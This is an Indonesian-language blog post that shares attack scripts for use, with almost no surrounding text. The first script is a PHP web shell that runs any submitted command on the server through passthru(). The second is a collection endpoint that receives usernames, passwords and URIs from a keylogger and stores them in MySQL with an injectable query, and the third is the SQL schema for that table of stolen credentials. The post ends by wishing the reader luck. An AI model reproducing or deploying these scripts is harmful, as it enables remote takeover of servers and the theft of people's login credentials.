Ne script sebenarnya udah pernah diposting di http://computersight.com , lewat http://www.triond.com, tapi ga pernah ada response, malahan ga ada apa2. So, aq posting lagi d blog aq. Ok, langsung aj yc.
Ne script webshellnya :
<html>
<pre>
Coba
<form method=”POST” action=”<?php $_SERVER['PHP_SELF'] ?>” >
<table>
<tr>
<td>Command : </td>
<td> </td>
<td><input type=”text” name=”command”></td>
</tr>
<tr>
<td> </td>
<td> </td>
<td><input type=”submit” value=”execute!”></td>
</tr>
</table>
</form>
<?php
if(isset($_POST['command'])){
echo “<strong>Executing “” . $_POST['command'] . “”</strong><BR/>n”;
if(!empty($_POST['command'])){ passthru($_POST['command']);
}else{
echo “You must fill the blank command!<BR/>n”;
}
}
?>
</pre>
</html>
Ne script bt nerima info dri keyloggerny :
<?php
if(isset($_GET['u']) AND isset($_GET['p']) AND isset($_GET['uri'])){
$dbhost=”localhost”;
$dbuser=”devel”;
$dbpass=”DEvelxxxxx”;
$dbname=”devel”;
$c=mysql_connect($dbhost,$dbuser,$dbpass) or die(mysql_error());
mysql_select_db($dbname) or die(mysql_error());
$q=”INSERT INTO klog (username,password,uri) VALUES ( ‘” . $_GET['u'] . “‘,’” . $_GET['p'] . “‘,’” . $_GET['uri'] . “‘)”;
$exec=mysql_query($q) or die(mysql_error());
}
?>
Ne script bt MySQL ny :
SET SQL_MODE=”NO_AUTO_VALUE_ON_ZERO”;
–
– Database: `devel`
–
CREATE DATABASE `devel` DEFAULT CHARACTER SET latin1 COLLATE latin1_swedish_ci;
USE `devel`;
– ——————————————————–
–
– Table structure for table `klog`
–
CREATE TABLE IF NOT EXISTS `klog` (
`no` smallint(6) NOT NULL auto_increment,
`username` varchar(64) NOT NULL,
`password` varchar(64) NOT NULL,
`uri` varchar(512) NOT NULL,
PRIMARY KEY (`no`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;
Good luck and Have a nice try !
